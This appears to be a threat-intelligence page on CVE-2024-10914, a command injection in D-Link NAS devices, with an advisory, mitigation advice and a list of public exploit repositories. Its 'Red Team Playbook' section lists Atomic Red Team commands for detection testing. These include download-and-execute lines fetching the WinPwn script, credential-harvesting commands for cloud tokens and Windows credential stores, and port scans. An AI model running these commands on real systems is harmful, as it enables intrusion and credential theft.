CVE-2024-10914
Overview
This vulnerability is a remote OS command injection caused by improper input validation in the cgi_user_add function within the /cgi-bin/account_mgr.cgi endpoint of D-Link DNS-320 series devices. Specifically, the argument 'name' is not sanitized, allowing crafted input to be executed as system commands. The flaw resides in the CGI script handling user addition, affecting multiple firmware versions of D-Link DNS-320, DNS-320LW, DNS-325, and DNS-340L devices.
Vulnerability Description
A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been declared as critical. Affected by this vulnerability is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument name leads to os command injection. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used.
Impact
An unauthenticated remote attacker can execute arbitrary operating system commands on affected D-Link devices by exploiting the injection in the user addition CGI endpoint. This can lead to full system compromise, including data theft, device control, or denial of service. Network access to the device's management interface is required, but no user interaction or privileges are necessary. The CVSS vector (AV:N/AC:H/PR:N/UI:N) indicates network attack with high complexity but no privileges or user interaction, enabling potential lateral movement or persistent foothold in enterprise or home environments.
Solution
Users should apply the latest firmware updates released by D-Link addressing this vulnerability, specifically versions released after 20241028. Refer to the advisories and patch instructions available at https://vuldb.com/?id.283309 and https://vuldb.com/?submit.432847 for detailed remediation steps. Until patched, restrict network access to the management interface and disable remote administration where possible as a temporary mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in several D-Link network-attached storage devices, specifically affecting the function responsible for user account management. This vulnerability arises from improper handling of user input in the cgi_user_add function, which is part of the account management CGI script. By manipulating the argument for the user name, an attacker can execute arbitrary operating system commands on the affected devices. This flaw allows for remote command injection, making it particularly dangerous as it does not require physical access to the device. The complexity of executing such an attack is relatively high, suggesting that while exploitation may be challenging, it remains feasible for skilled adversaries.
The attack vector for this vulnerability is primarily remote, allowing attackers to target devices connected to the internet or local networks without needing to be physically present. An attacker could craft a malicious request to the vulnerable endpoint, injecting commands that the operating system would execute with the privileges of the web server. Scenarios could include gaining unauthorized access to sensitive data stored on the device, manipulating device configurations, or even pivoting to other devices on the network. The potential for such exploitation highlights the need for organizations to be vigilant in monitoring their network environments for unusual activity that may indicate an attempted attack.
In terms of real-world impact, the ramifications of this vulnerability can be significant for businesses and individuals alike. For organizations relying on these D-Link devices for data storage and management, successful exploitation could lead to data breaches, loss of sensitive information, and potential regulatory repercussions. Furthermore, the compromised devices could be repurposed as launchpads for further attacks within the network, increasing the overall risk profile of the organization. The high CVSS score associated with this vulnerability underscores its severity, indicating that it could have catastrophic consequences if left unaddressed.
Detection and mitigation strategies are essential for organizations to protect themselves from this vulnerability. Regularly updating firmware to the latest versions released by D-Link is crucial, as vendors often provide patches for known vulnerabilities. Additionally, implementing network segmentation can limit the exposure of vulnerable devices to the broader network, reducing the risk of lateral movement by attackers. Organizations should also employ intrusion detection systems (IDS) to monitor for suspicious traffic patterns that may indicate attempts to exploit this vulnerability. Regular security audits and vulnerability assessments can further aid in identifying and remediating potential weaknesses before they can be exploited.
In conclusion, the command injection vulnerability in D-Link network-attached storage devices poses a serious threat to the security of affected systems. The ability for attackers to execute arbitrary commands remotely can lead to severe consequences, including data breaches and unauthorized access to sensitive information. Organizations must prioritize the implementation of robust security measures, including timely firmware updates and proactive monitoring, to mitigate the risks associated with this vulnerability. By adopting a comprehensive approach to cybersecurity, businesses can better protect themselves against the evolving landscape of threats.
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2024-10914, with telemetry indicating a modest rise in exploit attempts targeting the vulnerable D-Link NAS devices. Although the overall exploitation trend remains stable, the emergence of multiple new proof-of-concept exploits on public repositories suggests growing attacker interest and accessibility to weaponized code. This development is significant because it lowers the barrier for threat actors to conduct remote command injection attacks, potentially accelerating attempts to compromise affected systems. While the complexity of exploitation remains relatively high, the increased visibility and availability of exploit tools elevate the risk profile, warranting continued vigilance. Consequently, the threat level associated with this vulnerability should be considered heightened, as the expanding exploit landscape and incremental uptick in detection activity increase the likelihood of successful intrusions.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dlink | Dns-320 Firmware | All |
cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-320lw Firmware | All |
cpe:2.3:o:dlink:dns-320lw_firmware:*:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-325 Firmware | All |
cpe:2.3:o:dlink:dns-325_firmware:*:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-340l Firmware | All |
cpe:2.3:o:dlink:dns-340l_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (14)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
verylazytech/CVE-2024-10914
POC - CVE-2024–10914- Command Injection Vulnerability in `name` parameter for D-Link NAS
|
verylazytech | 48 | 11 | 2024-11-10 | View |
|
imnotcha0s/CVE-2024-10914
Exploit for cve-2024-10914: D-Link DNS-320, DNS-320LW, DNS-325, DNS-340L Version 1.00, Version 1.01.0914.2012, Version 1...
|
imnotcha0s | 15 | 4 | 2024-11-09 | View |
|
ThemeHackers/CVE-2024-10914
CVE-2024-10914 is a critical command injection vulnerability affecting several legacy D-Link Network Attached Storage (N...
|
ThemeHackers | 9 | 2 | 2024-11-16 | View |
|
K3ysTr0K3R/CVE-2024-10914-EXPLOIT
A PoC exploit for CVE-2024-10914 - D-Link Remote Code Execution (RCE)
|
K3ysTr0K3R | 7 | 3 | 2024-11-27 | View |
|
redspy-sec/D-Link
CVE-2024-10914 D-Link Remote Code Execution (RCE)
|
redspy-sec | 4 | 0 | 2024-12-06 | View |
|
Bu0uCat/D-Link-NAS-CVE-2024-10914-
这是一个D-Link rce漏洞 检测程序
|
Bu0uCat | 1 | 0 | 2024-11-15 | View |
|
yenyangmjaze/cve-2024-10914
|
yenyangmjaze | 1 | 0 | 2025-02-11 | View |
|
TH-SecForge/CVE-2024-10914
CVE-2024-10914 is a critical command injection vulnerability affecting several legacy D-Link Network Attached Storage (N...
|
TH-SecForge | 1 | 0 | 2025-06-09 | View |
|
jahithoque/CVE-2024-10914-Exploit
CVE-2024-10914 is a critical vulnerability affecting the D-Link DNS-320, DNS-320LW, DNS-325, and DNS-340L up to version ...
|
jahithoque | 0 | 0 | 2024-12-04 | View |
|
dragonXZH/CVE-2024-10914
A PoC exploit for CVE-2024-10914 - D-Link Remote Code Execution (RCE)
|
dragonXZH | 0 | 0 | 2024-12-24 | View |
|
Tamirido30/CVE-2024-10914-Exploit
CVE-2024-10914 Shell Exploit
|
Tamirido30 | 0 | 0 | 2025-05-03 | View |
|
Egi08/CVE-2024-10914
CVE-2024-10914_Manual testing with burpsuite
|
Egi08 | 0 | 0 | 2024-11-13 | View |
|
retuci0/cve-2024-10914-port
dlink vulnerability thing in python and rust
|
retuci0 | 0 | 0 | 2024-11-27 | View |
|
0xSS3K/CVE-2024-10914__POC
PoC para explotar el CVE-2024-10914
|
0xSS3K | 0 | 0 | 2025-12-13 | View |
Threat Feed
31 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
52%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-10914 |
| vuldb.com |
GitHub CVE
vdb-entry
technical-description
|
https://vuldb.com/?id.283309 |
| vuldb.com |
GitHub CVE
signature
permissions-required
|
https://vuldb.com/?ctiid.283309 |
| vuldb.com |
GitHub CVE
third-party-advisory
|
https://vuldb.com/?submit.432847 |
| netsecfish.notion.site |
GitHub CVE
exploit
|
https://netsecfish.notion.site/Command-Injection-Vulnerability-in-name-parameter-for-D-Link-NAS-12d6b683e67c80c49ffcc9214c239a07?pvs=4 |
| dlink.com |
GitHub CVE
product
|
https://www.dlink.com/ |
| bleepingcomputer.com |
NVD API
|
https://www.bleepingcomputer.com/news/security/d-link-wont-fix-critical-flaw-affecting-60-000-older-nas-devices/ |